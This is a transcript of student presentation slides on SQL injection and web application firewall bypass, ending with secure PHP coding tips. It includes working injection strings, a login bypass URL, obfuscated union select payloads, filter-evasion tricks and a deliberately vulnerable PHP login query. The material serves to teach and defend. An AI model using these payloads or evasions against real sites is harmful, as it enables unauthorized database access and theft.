All Ab0ut 0f SQL Injection and WAF Bypass Techniques
Download
Report
Transcript All Ab0ut 0f SQL Injection and WAF Bypass Techniques
All Ab0ut 0f SQL Injection
and WAF Bypass Techniques
THATSANAI DETDAMRONGPREEECHA
COMPUTER SCIENCE @ KING MONGKUT'S INSTITUTE OF TECHNOLOGY LADKRABANG
What is SQL Injection ?
Sql injection is code injection
Happened when user Inject sql command for change condition
because develop not filtered input from user
Logical Conjunction and
Disjunction table
SQL Operator
And , &&
Or , ||
Like
*
(,)
<,>
+, - , *, /, %
SQL Comment
end of the line
"#"
"--"
"-- "
multiple line
/* */
Examples
vulnerability and inject command
sql command :
SELECT first_name, last_name FROM users WHERE user_id = '$id‘
Inject code :
SELECT first_name, last_name FROM users WHERE user_id = '1‘ or ‘1’
SELECT
SELECT
SELECT
SELECT
SELECT
SELECT
first_name, last_name FROM users WHERE
first_name, last_name FROM users WHERE
first_name, last_name FROM users WHERE
first_name, last_name FROM users WHERE
first_name, last_name FROM users WHERE
first_name, last_name FROM users WHERE
user_id = 'am’ or ‘am’
user_id = ' ‘ or ‘1’=‘1’
user_id = ' ‘ or ‘2600’=‘2600’
user_id = ' ‘ or ‘HELLO’ or ‘HELLO’
user_id = ' ‘ or 1 #’
user_id = ' ‘ or true #’
sql command :
SELECT first_name, last_name FROM users WHERE user_id = $id
Inject code :
true
‘1’ or ‘1’
2 or 2
sql command :
SELECT first_name, last_name FROM users WHERE user_id = ($id)
Inject code :
1) or (1
2+3) or (5
http://cs.ssru.ac.th/cs01/mae/Pae/ตัวอย่างและโปรแกรมทีโ่ หลดๆมา/Login_thaicreate/PHP MySQL กับ Login
Form ทาระบบ User ล็อกอิ น แบบง่าย ๆ ด้วย PHP และ MySQL โดยทาการตรวจสอบ Username และ Password.htm
http://www.santosh143.com/2013/05/how-to-create-loginregister-system.html
http://www.exploit-db.com/exploits/26405/
http://www.exploit-db.com/exploits/26416/
Example
$sql = "SELECT * FROM members WHERE password='".md5($_GET['password'])."' AND
username='".$_GET['username']."'";
$result = mysql_query($sql, $db);
if ($result === FALSE)
die('Invalid SQL query');
if (mysql_num_rows($result) == 1) {
echo "Congrats, WIN!!!\n";
}
else {
echo "The number of rows is not 1\n";
}
login_sqli1.php?password=whatever&username='+or+1=1+LIMIT+1#
Impact
Get Information in database
Can gaining access system
Etc.
Bypass
Web Application Firewall Techniques
What is Web Application Firewall
Web application Firewall ( WAF )
Software or Hardware
Emphasis in prevention on the website
Filters all data in application layer
Can detected and prevention website
How to Bypass
?
Original
1’ or ‘1’=‘1
union all select 1,2,3,4,5 –
union all select 1,2,@@version,4,5 –
Solution
1’ oR ‘1’=‘1
uNIon AlL sELeCt 1,2,3,4,5 –
u/*2600*/ni/*12345*/on a/*..*/lL se/*AAAA*/lEct 1,2,@@VerSIon,4,5 --
How to Bypass
If Filter or , and
Solve :
?
Using || instead of or
Using && instead of and
(cont.)
How to Bypass
If Filter where
Solve :
(cont.)
Using limit instead of where
If Filter limit
Solve :
?
You can Using group by and having instead of where
How to Bypass
If Filter whitespace
Solve :
(cont.)
Using %0b instead of whitespace
If Filter ‘
Solve :
?
Using 0xXX , unhex(xx) instead of ‘
How to Mitigation
Top 5 Secure Coding Tips for PHP applications
Filter Input Data
GET , POST , COOKIE
Securing Database Queries
Filter Output Data
htmlspecialchars()
htmlentities()
strip_tags()
strtr()
Error Handling
log_errors = On
display_errors = Off
Preventing other injection attacks
References and Appendix
www.owasp.org
http://palpapers.plynt.com/issues/2009Dec/secure-coding-php/
http://dev.mysql.com/doc/refman/5.0/en/non-typedoperators.html
http://thtutz.blogspot.com